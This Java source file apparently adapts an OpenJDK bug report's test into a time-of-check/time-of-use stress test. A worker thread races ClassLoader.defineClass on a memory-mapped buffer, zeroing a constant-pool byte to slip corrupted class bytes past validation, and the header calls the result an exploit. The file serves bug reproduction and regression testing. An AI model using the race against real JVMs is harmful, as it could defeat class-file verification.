/*

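// This is a modified version of the test from https://bugs.openjdk.org/browse/JDK-8365588.
// Unlike the original, it does not use java.lang.foreign.MemorySegment: the same exploit can be
// implemented with older APIs, namely RandomAccessFile / FileChannel.map (available since JDK 1.4)
// together with ClassLoader.defineClass(String, ByteBuffer, ProtectionDomain) (available since JDK 5).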

wget https://repo1.maven.org/maven2/org/ow2/asm/asm/9.8/asm-9.8.jar
mkdir -p toctou
javac -d toctou -cp asm-9.8.jar TocTouTest2.java
java  -cp toctou:asm-9.8.jar toctou.TocTouTest2

*/


package toctou;

import java.io.ByteArrayInputStream;
import java.io.DataInputStream;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.RandomAccessFile;
import java.lang.reflect.Method;
import java.nio.ByteBuffer;
import java.nio.channels.FileChannel;
import java.util.concurrent.ConcurrentLinkedDeque;
import java.util.concurrent.atomic.AtomicInteger;
import org.objectweb.asm.ClassReader;
import org.objectweb.asm.ClassWriter;

import static org.objectweb.asm.Opcodes.*;

/**
 * Time-of-check/time-of-use stress test for
 * {@link ClassLoader#defineClass(String, ByteBuffer, java.security.ProtectionDomain)}.
 *
 * <p>The test generates a tiny class whose single method name and returned literal are the same
 * string. It then repeatedly defines that class from a buffer, while a daemon thread concurrently
 * writes a zero byte over the first character of that string's {@code CONSTANT_Utf8} entry.
 *
 * <ul>
 *   <li>A {@link ClassFormatError} means the corrupted bytes were seen and rejected. The attempt is
 *       retried.
 *   <li>A class that defines successfully but lacks the original method name means corrupted bytes
 *       got through.
 * </ul>
 *
 * <p>The loop has no normal exit. It ends only when some other exception escapes, at which point the
 * number of attempts is printed.
 */
public class TocTouTest2 {

    /**
     * Experiment switch. {@code true} passes {@code defineClass} a heap copy of the class bytes.
     * {@code false} (the default) passes a memory-mapped view of a temporary file. Presumably the
     * heap variant is kept as a control. NOTE(review): confirm intent with the author.
     */
    private static final boolean USE_HEAP_BUFFER = false;

    /** File that receives an unmodified copy of the generated class, for offline inspection. */
    private static final String PRISTINE_CLASS_FILE = "TocTou.class";

    /** Scratch file that is rewritten and memory-mapped on every define attempt. */
    private static final String MAPPED_CLASS_FILE = "TocTou_tmp.class";

    public static void main(String[] args) throws Exception {
        // Built at runtime rather than written as a literal. NOTE(review): presumably so this
        // class's own constant pool does not already contain "corrupted_string"; confirm.
        var string = "corrupted_strin!".replace('!', 'g');
        // The name the method would carry if the worker's zero byte survives class loading.
        var corruptedString = '\0' + string.substring(1);

        byte[] bytes = generateTestClass(string);
        int byteOffset = findUtf8Offset(bytes, string);

        record Entry(ByteBuffer bb) {}
        var queue = new ConcurrentLinkedDeque<Entry>();

        // Busy-polls for freshly staged buffers and zeroes the target byte in each one. It spins
        // deliberately, without blocking, so it can react as soon as a buffer is offered.
        var corrupter = Thread.ofPlatform().daemon().start(() -> {
            do {
                Entry entry = queue.poll();
                if (entry != null) {
                    entry.bb().slice().put(byteOffset, (byte) 0);
                }
            } while (!Thread.interrupted());
        });

        System.out.println("Size = " + bytes.length);
        try (var out = new FileOutputStream(PRISTINE_CLASS_FILE)) {
            out.write(bytes);
        }

        class Loader extends ClassLoader {
            /**
             * Stages a fresh, uncorrupted copy of the class bytes and hands it to the corrupter
             * thread. Then, racing that thread, it defines the class from the same buffer.
             *
             * @return the defined class
             * @throws ClassFormatError if the VM rejects the (possibly corrupted) bytes
             */
            Class<?> define() {
                ByteBuffer bb;
                if (USE_HEAP_BUFFER) {
                    bb = ByteBuffer.wrap(bytes.clone());
                } else {
                    try {
                        bb = mapFreshCopy(bytes);
                    } catch (IOException e) {
                        // The harness cannot run without its scratch file: fail loudly, with a
                        // non-zero status so callers do not mistake this for success.
                        e.printStackTrace();
                        System.exit(1);
                        throw new AssertionError("unreachable", e);
                    }
                }

                System.out.println("Offered");
                queue.offer(new Entry(bb));
                System.out.println("defineClass()");
                Class<?> c = defineClass(null, bb, null);
                System.out.println("Good");
                return c;
            }
        }

        var loader = new Loader();

        // Counts every define attempt, including those rejected with ClassFormatError.
        int n = 0;
        try {
            for (; ; n++) {
                Class<?> c;
                try {
                    c = loader.define();
                    // A ClassLoader can define a given class name only once, so take a new one.
                    loader = new Loader();
                } catch (ClassFormatError e) {
                    // JVMS 4.4.7 forbids a zero byte in a CONSTANT_Utf8 entry, so bytes corrupted
                    // before parsing are rejected here. The same loader is reused for the retry.
                    System.out.println(e + "=======");
                    continue;
                }
                Method method;
                try {
                    method = c.getDeclaredMethod(string);
                } catch (NoSuchMethodException e) {
                    // The defined class no longer has the original name: look for the zeroed one.
                    System.out.println(e);
                    method = c.getDeclaredMethod(corruptedString);
                }
                System.out.println(method);
                String myString = (String) method.invoke(null);
                if (!string.equals(myString)) {
                    System.out.println(myString);
                }
            }
        } finally {
            System.out.println("Failed after " + n + " times");
            corrupter.interrupt();
        }
    }

    /**
     * Generates the bytes of class {@code toctou.Test}. It has a single method
     * {@code public static String <name>()} that returns {@code name} via {@code ldc}.
     *
     * <p>ASM de-duplicates constants, so the method name and the returned literal share one
     * {@code CONSTANT_Utf8} entry.
     *
     * @param name method name, which is also the value the method returns
     * @return the class file bytes
     */
    private static byte[] generateTestClass(String name) {
        var cw = new ClassWriter(0);
        cw.visit(V17, ACC_PUBLIC, "toctou/Test", null, "java/lang/Object", null);
        var mv = cw.visitMethod(ACC_PUBLIC | ACC_STATIC, name, "()Ljava/lang/String;", null, null);
        mv.visitCode();
        mv.visitLdcInsn(name);
        mv.visitInsn(ARETURN);
        mv.visitMaxs(1, 0);
        mv.visitEnd();
        cw.visitEnd();
        return cw.toByteArray();
    }

    /**
     * Locates the first {@code CONSTANT_Utf8} entry equal to {@code value}.
     *
     * @param classBytes a class file
     * @param value      the string to look for
     * @return the offset in {@code classBytes} of the entry's first character byte, just past its
     *         u2 length prefix
     * @throws IllegalStateException if no {@code CONSTANT_Utf8} entry equals {@code value}
     * @throws IOException           if a {@code CONSTANT_Utf8} entry is not valid modified UTF-8
     */
    private static int findUtf8Offset(byte[] classBytes, String value) throws IOException {
        var reader = new ClassReader(classBytes);
        for (int i = 1; i < reader.getItemCount(); i++) {
            // getItem points just past the entry's tag byte. It is 0 for the unused slot that
            // follows a CONSTANT_Long / CONSTANT_Double entry, which must be skipped.
            int offset = reader.getItem(i);
            if (offset == 0 || (classBytes[offset - 1] & 0xFF) != 1) { // tag 1 == CONSTANT_Utf8
                continue;
            }
            var in = new DataInputStream(
                    new ByteArrayInputStream(classBytes, offset, classBytes.length - offset));
            if (in.readUTF().equals(value)) {
                return offset + 2;
            }
        }
        throw new IllegalStateException("No CONSTANT_Utf8 entry equal to \"" + value + "\"");
    }

    /**
     * Rewrites {@link #MAPPED_CLASS_FILE} with {@code classBytes} and maps the whole file
     * read-write. Rewriting the file restores any byte zeroed on a previous attempt. The mapping
     * stays valid after the channel is closed, as specified by {@link FileChannel#map}.
     *
     * @param classBytes the bytes to write and map
     * @return a read-write mapped view of the freshly written file
     * @throws IOException if the file cannot be written or mapped
     */
    private static ByteBuffer mapFreshCopy(byte[] classBytes) throws IOException {
        File f = new File(MAPPED_CLASS_FILE);
        try (var out = new FileOutputStream(f)) {
            out.write(classBytes);
        }
        try (var raf = new RandomAccessFile(f, "rw"); FileChannel channel = raf.getChannel()) {
            return channel.map(FileChannel.MapMode.READ_WRITE, 0, channel.size());
        }
    }
}
